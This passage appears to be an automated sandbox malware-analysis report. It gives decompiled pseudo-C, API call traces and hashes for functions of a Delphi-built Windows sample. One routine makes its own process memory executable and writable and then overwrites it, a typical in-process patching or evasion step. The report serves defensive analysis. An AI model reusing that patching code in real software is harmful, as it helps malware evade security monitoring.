											_t112 = LoadLibraryExA( &_v289, 0, 2);
										}
									}
								}
							}
							return _t112;
						} else {
							goto L3;
						}
					}
				}
			}

0x032a5a91
0x032a5a93
0x032a5a9b
0x032a5aac
0x032a5ab1
0x032a5aca
0x032a5ad1
0x032a5b13
0x032a5b15
0x032a5b16
0x032a5b1b
0x032a5b1e
0x032a5b21
0x032a5b33
0x032a5b56
0x032a5b76
0x032a5b76
0x032a5b7a
0x032a5b80
0x032a5b83
0x032a5b86
0x032a5b94
0x032a5ad3
0x032a5ae8
0x032a5aef
0x00000000
0x032a5af1
0x032a5b06
0x032a5b0d
0x032a5bac
0x032a5bbf
0x032a5bc4
0x032a5bcd
0x032a5bf7
0x032a5bfc
0x032a5bfb
0x032a5bfb
0x032a5c0b
0x032a5c13
0x032a5c19
0x032a5c1e
0x032a5c31
0x032a5c46
0x032a5c46
0x032a5c4a
0x032a5c69
0x032a5c7e
0x032a5c82
0x032a5c84
0x032a5c9f
0x032a5cb4
0x032a5cb4
0x032a5c82
0x032a5c4a
0x032a5c13
0x032a5cbd
0x00000000
0x00000000
0x00000000
0x032a5b0d
0x032a5aef

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,032A0000,032C9790), ref: 032A5AAC
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,032A0000,032C9790), ref: 032A5ACA
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,032A0000,032C9790), ref: 032A5AE8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 032A5B06
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,032A5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 032A5B4F
RegQueryValueExA.ADVAPI32(?,032A5CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,032A5B95,?,80000001), ref: 032A5B6D
RegCloseKey.ADVAPI32(?,032A5B9C,00000000,?,?,00000000,032A5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 032A5B8F
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 032A5BAC
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 032A5BB9
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 032A5BBF
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 032A5BEA
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 032A5C31
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 032A5C41
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 032A5C69
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 032A5C79
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 032A5C9F
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 032A5CAF

Strings

Software\Borland\Delphi\Locales, xrefs: 032A5AFC
Software\Borland\Locales, xrefs: 032A5AC0, 032A5ADE

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: cae1098a3be0630efd57b515497619860e5064e15d076555874181288c7d5db1
Instruction ID: 97e01c62b6c68b098c8da5b08bf73ee86b2e7a978aaf25edcb6b39b07656d9ae
Opcode Fuzzy Hash: cae1098a3be0630efd57b515497619860e5064e15d076555874181288c7d5db1
Instruction Fuzzy Hash: 4E51E975A60B1D7FFB21D6ACCC45FEFB7EC9B05740F1401A1A640E6185E6B4EAC88B60

Uniqueness

Uniqueness Score: -1.00%

Function 032BCBE8 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 31%

			E032BCBE8(char __eax, void* __ebx, void* __edx, void* __esi) {
				char _v8;
				void* _v12;
				char _v20;
				void* _v28;
				void* _v52;
				intOrPtr _v68;
				void _v76;
				void* _t49;
				intOrPtr _t56;
				intOrPtr _t58;
				void* _t61;

				_t49 = __edx;
				_v8 = __eax;
				E032A4EE4( &_v8);
				_push(_t61);
				_push(0x32bccb8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61 + 0xffffffb8;
				E032A44A0(_t49);
				_push(0);
				_push(0);
				_push( &_v20);
				_push(E032A4DB4(_v8));
				L032BCA44();
				E032BCA4C( &_v52, 0x40,  &_v20, 0, 0, 0);
				NtOpenFile( &_v12, 0x100001,  &_v52,  &_v28, 1, 0x20); // executed
				NtQueryInformationFile(_v12,  &_v28,  &_v76, 0x18, 5);
				_t58 = _v68;
				E032A4B90(_t49, _t58);
				_push(0);
				_push(0);
				_push(_t58);
				_push(E032A49BC(_t49));
				_push( &_v28);
				_push(0);
				_push(0);
				_push(0);
				_push(_v12); // executed
				L032B7D28(); // executed
				NtClose(_v12);
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x32bccbf);
				return E032A4C24( &_v8);
			}

0x032bcbf0
0x032bcbf2
0x032bcbf8
0x032bcbff
0x032bcc00
0x032bcc05
0x032bcc08
0x032bcc0d
0x032bcc12
0x032bcc14
0x032bcc19
0x032bcc22
0x032bcc23
0x032bcc39
0x032bcc53
0x032bcc68
0x032bcc6d
0x032bcc74
0x032bcc79
0x032bcc7b
0x032bcc7d
0x032bcc85
0x032bcc89
0x032bcc8a
0x032bcc8c
0x032bcc8e
0x032bcc93
0x032bcc94
0x032bcc9d
0x032bcca4
0x032bcca7
0x032bccaa
0x032bccb7

APIs

Part of subcall function 032A4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 032A4EF2

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,032BCCB8), ref: 032BCC23
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,032BCCB8), ref: 032BCC53
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 032BCC68
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 032BCC94
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 032BCC9D

Part of subcall function 032A4C24: SysFreeString.OLEAUT32(032BD70C), ref: 032A4C32

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
String ID:
API String ID: 1897104825-0
Opcode ID: bec87468240134249fea3d37ae6d67f3f1cf28fc67e4037d8f0ac00b3d7fc146
Instruction ID: 59df5a2efd2bdfc52fe9438c5da234e68db4cabf313073e3e6278ede3fe53240
Opcode Fuzzy Hash: bec87468240134249fea3d37ae6d67f3f1cf28fc67e4037d8f0ac00b3d7fc146
Instruction Fuzzy Hash: EB21C175A50719BBDB11EAD9CC52FDE77BCAF48B40F500461B600FB280D7F4AA458794

Uniqueness

Uniqueness Score: -1.00%

Function 032B7B88 Relevance: 6.0, APIs: 4, Instructions: 32
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E032B7B88(PVOID* __eax, signed int __ecx, void* __edx) {
				PVOID* _v12;
				void _v28;
				long* _t4;
				long* _t5;
				long _t13;
				void* _t14;
				signed int _t20;

				_push(__ecx);
				_t20 = __ecx;
				_t14 = __edx;
				_v12 = __eax;
				_t4 =  *0x32de354; // 0x4
				_t5 = __ecx * 0x32;
				NtProtectVirtualMemory(GetCurrentProcess(), _v12, _t5, 0x40, _t4);
				E032B7B7C(_t14, _t20, _v28);
				_t13 = NtWriteVirtualMemory(GetCurrentProcess(),  &_v28, _t14, 4, 0x32de354); // executed
				return _t13;
			}

0x032b7b8a
0x032b7b8b
0x032b7b8d
0x032b7b8f
0x032b7b92
0x032b7b9a
0x032b7ba9
0x032b7bb5
0x032b7bcd
0x032b7bd5

APIs

GetCurrentProcess.KERNEL32(00000000,00000004,00000040,00000004,00000005,?,032A6748,032B7C01,?,032B7C7C,74180000,00000000,00000000,00000000,00000000,00000000), ref: 032B7BA3
NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000004,00000040,00000004,00000005,?,032A6748,032B7C01,?,032B7C7C,74180000,00000000,00000000,00000000,00000000), ref: 032B7BA9
GetCurrentProcess.KERNEL32(00000000,032DE34C,00000004,032DE354,00000000,00000000,00000004,00000040,00000004,00000005,?,032A6748,032B7C01,?,032B7C7C,74180000), ref: 032B7BC7
NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,032DE34C,00000004,032DE354,00000000,00000000,00000004,00000040,00000004,00000005,?,032A6748,032B7C01,?,032B7C7C), ref: 032B7BCD

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: CurrentMemoryProcessVirtual$ProtectWrite
String ID:
API String ID: 1222570558-0
Opcode ID: 0004ddca4a5a6a0634f32e93a046e4e8a65fc879f7cfd13430cdcc7696cf43b9
Instruction ID: 4582e77c7beafc0a2e0f3eec0023f3ec77ff4ab3bb81fc408f8f93cc2d89910e
Opcode Fuzzy Hash: 0004ddca4a5a6a0634f32e93a046e4e8a65fc879f7cfd13430cdcc7696cf43b9
Instruction Fuzzy Hash: 49E06DBA7187003FD604FAAC9C84E6B63DC9FC8750F058829B359EB250C6B89840466A

Uniqueness

Uniqueness Score: -1.00%

Function 032B6DC0 Relevance: 1.5, APIs: 1, Instructions: 48
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E032B6DC0(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v24;
				char _v28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t34;
				void* _t35;
				intOrPtr _t36;

				_t34 = _t35;
				_t36 = _t35 + 0xffffffd8;
				_push(__esi);
				_v28 = 0;
				_v8 = __eax;
				_push(_t34);
				_push(0x32b6e93);
				_push( *[fs:eax]);
				 *[fs:eax] = _t36;
				_push(_t34);
				_push(0x32b6e23);
				_push( *[fs:eax]);
				 *[fs:eax] = _t36;
				E032B6D64(_v8, __edx, 0,  &_v24, __esi, __eflags); // executed
				_push(E032A5E70(__edx));
				_push(0x32b6ea4);
				_push(5);
				_push( &_v24); // executed
				L032ACDA4(); // executed
				E032B6D54( &_v24);
				_pop(_t29);
				 *[fs:eax] = _t29;
				_t30 = 0;
				 *[fs:eax] = _t30;
				_push(0x32b6e9a);
				return E032A44A0( &_v28);
			}

0x032b6dc1
0x032b6dc3
0x032b6dc7
0x032b6dcb
0x032b6dd0
0x032b6dd5
0x032b6dd6
0x032b6ddb
0x032b6dde
0x032b6de3
0x032b6de4
0x032b6de9
0x032b6dec
0x032b6df5
0x032b6e01
0x032b6e02
0x032b6e07
0x032b6e0e
0x032b6e0f
0x032b6e14
0x032b6e1b
0x032b6e1e
0x032b6e7f
0x032b6e82
0x032b6e85
0x032b6e92

APIs

Part of subcall function 032B6D64: CLSIDFromProgID.OLE32(00000000,?,00000000,032B6DB1,?,?,?,00000000), ref: 032B6D91

CoCreateInstance.OLE32(?,00000000,00000005,032B6EA4,00000000,00000000,032B6E23,?,00000000,032B6E93), ref: 032B6E0F

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: 98faa5193ec31b44e7183908bde7398a68dad3dfc08ce34f6968f5c2ebc5623c
Instruction ID: 05cff2759dd7de87751d8b5c8d4ee31191d190e261a713bab2bdd6842359c669
Opcode Fuzzy Hash: 98faa5193ec31b44e7183908bde7398a68dad3dfc08ce34f6968f5c2ebc5623c
Instruction Fuzzy Hash: 7B014935628B04AFD711DF64DC52DAFBBBCEB49B50F514475F900E6A80E6B05D40CAB4

Uniqueness

Uniqueness Score: -1.00%

Function 032A1724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E032A1724(signed int __eax) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* _t96;
				void** _t99;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				intOrPtr* _t114;
				void* _t116;
				void* _t121;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				unsigned int _t141;
				signed int _t142;
				void* _t144;
				void* _t147;
				intOrPtr _t148;
				signed int _t150;
				long _t156;
				intOrPtr _t159;
				signed int _t162;

				_t129 =  *0x32db04d; // 0x0
				if(__eax > 0xa2c) {
					__eflags = __eax - 0x40a2c;
					if(__eax > 0x40a2c) {
						_pop(_t120);
						__eflags = __eax;
						if(__eax >= 0) {
							_push(_t120);
							_t162 = __eax;
							_t156 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000;
							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
							_t121 = _t96;
							if(_t121 != 0) {
								_t147 = _t121;
								 *((intOrPtr*)(_t147 + 8)) = _t162;
								 *(_t147 + 0xc) = _t156 | 0x00000004;
								E032A1644();
								_t99 =  *0x32dd7b0; // 0x7f7f0000
								 *_t147 = 0x32dd7ac;
								 *0x32dd7b0 = _t121;
								 *(_t147 + 4) = _t99;
								 *_t99 = _t121;
								 *0x32dd7a8 = 0;
								_t121 = _t121 + 0x10;
							}
							return _t121;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t125 = (__eax + 0x000000d3 & 0xffffff00) + 0x30;
						__eflags = _t129;
						if(__eflags != 0) {
							while(1) {
								asm("lock cmpxchg [0x32db718], ah");
								if(__eflags == 0) {
									goto L39;
								}
								Sleep(0);
								asm("lock cmpxchg [0x32db718], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									continue;
								}
								goto L39;
							}
						}
						L39:
						_t141 = _t125 - 0xb30;
						_t142 = _t141 >> 0xd;
						_t131 = _t141 >> 8;
						_t104 = 0xffffffff << _t131 &  *(0x32db728 + _t142 * 4);
						__eflags = 0xffffffff;
						if(0xffffffff == 0) {
							_t132 = _t142;
							__eflags = 0xfffffffe << _t132 &  *0x32db724;
							if((0xfffffffe << _t132 &  *0x32db724) == 0) {
								_t133 =  *0x32db720; // 0x70050
								_t134 = _t133 - _t125;
								__eflags = _t134;
								if(_t134 < 0) {
									_t109 = E032A15CC(_t125);
								} else {
									_t110 =  *0x32db71c; // 0x9270060
									_t109 = _t110 - _t125;
									 *0x32db71c = _t109;
									 *0x32db720 = _t134;
									 *(_t109 - 4) = _t125 | 0x00000002;
								}
								 *0x32db718 = 0;
								return _t109;
							} else {
								asm("bsf edx, eax");
								asm("bsf ecx, eax");
								_t135 = _t132 | _t142 << 0x00000005;
								goto L47;
							}
						} else {
							asm("bsf eax, eax");
							_t135 = _t131 & 0xffffffe0 | _t104;
							L47:
							_push(_t152);
							_push(_t145);
							_t148 = 0x32db7a8 + _t135 * 8;
							_t159 =  *((intOrPtr*)(_t148 + 4));
							_t114 =  *((intOrPtr*)(_t159 + 4));
							 *((intOrPtr*)(_t148 + 4)) = _t114;
							 *_t114 = _t148;
							__eflags = _t148 - _t114;
							if(_t148 == _t114) {
								asm("rol eax, cl");
								_t80 = 0x32db728 + _t142 * 4;
								 *_t80 =  *(0x32db728 + _t142 * 4) & 0xfffffffe;
								__eflags =  *_t80;
								if( *_t80 == 0) {
									asm("btr [0x32db724], edx");
								}
							}
							_t150 = 0xfffffff0 &  *(_t159 - 4);
							_t144 = 0xfffffff0 - _t125;
							__eflags = 0xfffffff0;
							if(0xfffffff0 == 0) {
								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
								__eflags =  *_t89;
							} else {
								_t116 = _t125 + _t159;
								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
								__eflags = 0xfffffff0 - 0xb30;
								if(0xfffffff0 >= 0xb30) {
									E032A1500(_t116, 0xfffffffffffffff3, _t144);
								}
							}
							 *(_t159 - 4) = _t125 + 2;
							 *0x32db718 = 0;
							return _t159;
						}
					}
				} else {
					__eflags = __cl;
					__eax =  *(__edx + 0x32db5c0) & 0x000000ff;
					__ebx = 0x32c9040 + ( *(__edx + 0x32db5c0) & 0x000000ff) * 8;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L5;
							}
							__ebx = __ebx + 0x20;
							__eflags = __ebx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__ebx != 0) {
								__ebx = __ebx + 0x20;
								__eflags = __ebx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__ebx != 0) {
									__ebx = __ebx - 0x40;
									__eflags = __ebx;
									Sleep(0);
									__eax = 0x100;
									asm("lock cmpxchg [ebx], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
							}
							goto L5;
						}
					}
					L5:
					__edx =  *(__ebx + 4);
					__eax =  *(__edx + 8);
					__ecx = 0xfffffff8;
					__eflags = __edx - __ebx;
					if(__edx == __ebx) {
						__edx =  *(__ebx + 0x10);
						__ecx =  *(__ebx + 2) & 0x0000ffff;
						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
						__eflags = __eax -  *(__ebx + 0xc);
						if(__eax >  *(__ebx + 0xc)) {
							_push(__esi);
							_push(__edi);
							__eflags =  *0x32db04d;
							if(__eflags != 0) {
								while(1) {
									__eax = 0x100;
									asm("lock cmpxchg [0x32db718], ah");
									if(__eflags == 0) {
										goto L20;
									}
									Sleep(0);
									__eax = 0x100;
									asm("lock cmpxchg [0x32db718], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
									goto L20;
								}
							}
							L20:
							 *(__ebx + 1) =  *(__ebx + 1) &  *0x32db724;
							__eflags =  *(__ebx + 1) &  *0x32db724;
							if(( *(__ebx + 1) &  *0x32db724) == 0) {
								__ecx =  *(__ebx + 0x18) & 0x0000ffff;
								__edi =  *0x32db720; // 0x70050
								__eflags = __edi - ( *(__ebx + 0x18) & 0x0000ffff);
								if(__edi < ( *(__ebx + 0x18) & 0x0000ffff)) {
									__eax =  *(__ebx + 0x1a) & 0x0000ffff;
									__edi = __eax;
									__eax = E032A15CC(__eax);
									__esi = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										goto L33;
									} else {
										 *0x32db718 = __al;
										 *__ebx = __al;
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								} else {
									__esi =  *0x32db71c; // 0x9270060
									__ecx =  *(__ebx + 0x1a) & 0x0000ffff;
									__edx = __ecx + 0xb30;
									__eflags = __edi - __ecx + 0xb30;
									if(__edi >= __ecx + 0xb30) {
										__edi = __ecx;
									}
									__esi = __esi - __edi;
									 *0x32db720 =  *0x32db720 - __edi;
									 *0x32db71c = __esi;
									goto L33;
								}
							} else {
								asm("bsf eax, esi");
								__esi = __eax * 8;
								__ecx =  *(0x32db728 + __eax * 4);
								asm("bsf ecx, ecx");
								__ecx =  *(0x32db728 + __eax * 4) + __eax * 8 * 4;
								__edi = 0x32db7a8 + ( *(0x32db728 + __eax * 4) + __eax * 8 * 4) * 8;
								__esi =  *(__edi + 4);
								__edx =  *(__esi + 4);
								 *(__edi + 4) = __edx;
								 *__edx = __edi;
								__eflags = __edi - __edx;
								if(__edi == __edx) {
									__edx = 0xfffffffe;
									asm("rol edx, cl");
									_t38 = 0x32db728 + __eax * 4;
									 *_t38 =  *(0x32db728 + __eax * 4) & 0xfffffffe;
									__eflags =  *_t38;
									if( *_t38 == 0) {
										asm("btr [0x32db724], eax");
									}
								}
								__edi = 0xfffffff0;
								__edi = 0xfffffff0 &  *(__esi - 4);
								__eflags = 0xfffffff0 - 0x10a60;
								if(0xfffffff0 < 0x10a60) {
									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
									__eflags =  *_t52;
								} else {
									__edx = __edi;
									__edi =  *(__ebx + 0x1a) & 0x0000ffff;
									__edx = __edx - __edi;
									__eax = __edi + __esi;
									__ecx = __edx + 3;
									 *(__eax - 4) = __ecx;
									 *(__edx + __eax - 8) = __edx;
									__eax = E032A1500(__eax, __ecx, __edx);
								}
								L33:
								_t56 = __edi + 6; // 0x70056
								__ecx = _t56;
								 *(__esi - 4) = _t56;
								__eax = 0;
								 *0x32db718 = __al;
								 *__esi = __ebx;
								 *((intOrPtr*)(__esi + 8)) = 0;
								 *((intOrPtr*)(__esi + 0xc)) = 1;
								 *(__ebx + 0x10) = __esi;
								_t61 = __esi + 0x20; // 0x9270080
								__eax = _t61;
								__ecx =  *(__ebx + 2) & 0x0000ffff;
								__edx = __ecx + __eax;
								 *(__ebx + 8) = __ecx + __eax;
								__edi = __edi + __esi;
								__edi = __edi - __ecx;
								__eflags = __edi;
								 *(__ebx + 0xc) = __edi;
								 *__ebx = 0;
								 *(__eax - 4) = __esi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
						} else {
							_t19 = __edx + 0xc;
							 *_t19 =  *(__edx + 0xc) + 1;
							__eflags =  *_t19;
							 *(__ebx + 8) = __ecx;
							 *__ebx = 0;
							 *(__eax - 4) = __edx;
							_pop(__ebx);
							return __eax;
						}
					} else {
						 *(__edx + 0xc) =  *(__edx + 0xc) + 1;
						__ecx = 0xfffffff8 &  *(__eax - 4);
						__eflags = 0xfffffff8;
						 *(__edx + 8) = 0xfffffff8 &  *(__eax - 4);
						 *(__eax - 4) = __edx;
						if(0xfffffff8 == 0) {
							__ecx =  *(__edx + 4);
							 *(__ecx + 0x14) = __ebx;
							 *(__ebx + 4) = __ecx;
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						} else {
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}

0x032a1730
0x032a1736
0x032a1968
0x032a196d
0x032a1a80
0x032a1a81
0x032a1a83
0x032a1684
0x032a1688
0x032a1694
0x032a16a4
0x032a16a9
0x032a16ad
0x032a16af
0x032a16b1
0x032a16b7
0x032a16ba
0x032a16bf
0x032a16c4
0x032a16ca
0x032a16d0
0x032a16d3
0x032a16d5
0x032a16dc
0x032a16dc
0x032a16e5
0x032a1a89
0x032a1a89
0x032a1a8b
0x032a1a8b
0x032a1973
0x032a197f
0x032a1982
0x032a1984
0x032a1938
0x032a193d
0x032a1945
0x00000000
0x00000000
0x032a1949
0x032a1953
0x032a195b
0x032a195f
0x00000000
0x032a195f
0x00000000
0x032a195b
0x032a1938
0x032a1986
0x032a1986
0x032a198e
0x032a1991
0x032a199b
0x032a199b
0x032a19a2
0x032a19b5
0x032a19b9
0x032a19bf
0x032a19d8
0x032a19de
0x032a19de
0x032a19e0
0x032a19fe
0x032a19e2
0x032a19e2
0x032a19e7
0x032a19e9
0x032a19ee
0x032a19f7
0x032a19f7
0x032a1a03
0x032a1a0b
0x032a19c1
0x032a19c1
0x032a19cb
0x032a19d3
0x00000000
0x032a19d3
0x032a19a4
0x032a19a7
0x032a19aa
0x032a1a0c
0x032a1a0c
0x032a1a0d
0x032a1a0e
0x032a1a15
0x032a1a18
0x032a1a1b
0x032a1a1e
0x032a1a20
0x032a1a22
0x032a1a29
0x032a1a2b
0x032a1a2b
0x032a1a2b
0x032a1a32
0x032a1a34
0x032a1a34
0x032a1a32
0x032a1a40
0x032a1a45
0x032a1a45
0x032a1a47
0x032a1a68
0x032a1a68
0x032a1a68
0x032a1a49
0x032a1a49
0x032a1a4f
0x032a1a52
0x032a1a56
0x032a1a5c
0x032a1a5e
0x032a1a5e
0x032a1a5c
0x032a1a70
0x032a1a73
0x032a1a7f
0x032a1a7f
0x032a19a2
0x032a173c
0x032a173c
0x032a173e
0x032a1745
0x032a174c
0x032a17a4
0x032a17a4
0x032a17a9
0x032a17ad
0x00000000
0x00000000
0x032a17af
0x032a17af
0x032a17b2
0x032a17b7
0x032a17bb
0x032a17bd
0x032a17bd
0x032a17c0
0x032a17c5
0x032a17c9
0x032a17cb
0x032a17cb
0x032a17d0
0x032a17d5
0x032a17da
0x032a17de
0x032a17e6
0x00000000
0x032a17e6
0x032a17de
0x032a17c9
0x00000000
0x032a17bb
0x032a17a4
0x032a174e
0x032a174e
0x032a1751
0x032a1754
0x032a1759
0x032a175b
0x032a1774
0x032a1777
0x032a177b
0x032a177d
0x032a1780
0x032a17f0
0x032a17f1
0x032a17f2
0x032a17f9
0x032a17fb
0x032a17fb
0x032a1800
0x032a1808
0x00000000
0x00000000
0x032a180c
0x032a1811
0x032a1816
0x032a181e
0x032a1822
0x00000000
0x032a1822
0x00000000
0x032a181e
0x032a17fb
0x032a182c
0x032a1830
0x032a1830
0x032a1836
0x032a18a8
0x032a18ac
0x032a18b2
0x032a18b4
0x032a18dc
0x032a18e0
0x032a18e2
0x032a18e7
0x032a18e9
0x032a18eb
0x00000000
0x032a18ed
0x032a18ed
0x032a18f2
0x032a18f4
0x032a18f5
0x032a18f6
0x032a18f7
0x032a18f7
0x032a18b6
0x032a18b6
0x032a18bc
0x032a18c0
0x032a18c6
0x032a18c8
0x032a18ca
0x032a18ca
0x032a18cc
0x032a18ce
0x032a18d4
0x00000000
0x032a18d4
0x032a1838
0x032a1838
0x032a183b
0x032a1842
0x032a1849
0x032a184c
0x032a184f
0x032a1856
0x032a1859
0x032a185c
0x032a185f
0x032a1861
0x032a1863
0x032a1865
0x032a186a
0x032a186c
0x032a186c
0x032a186c
0x032a1873
0x032a1875
0x032a1875
0x032a1873
0x032a187c
0x032a1881
0x032a1884
0x032a188a
0x032a18f8
0x032a18f8
0x032a18f8
0x032a188c
0x032a188c
0x032a188e
0x032a1892
0x032a1894
0x032a1897
0x032a189a
0x032a189d
0x032a18a1
0x032a18a1
0x032a18fd
0x032a18fd
0x032a18fd
0x032a1900
0x032a1903
0x032a1905
0x032a190a
0x032a190c
0x032a190f
0x032a1916
0x032a1919
0x032a1919
0x032a191c
0x032a1920
0x032a1923
0x032a1926
0x032a1928
0x032a1928
0x032a192a
0x032a192d
0x032a1930
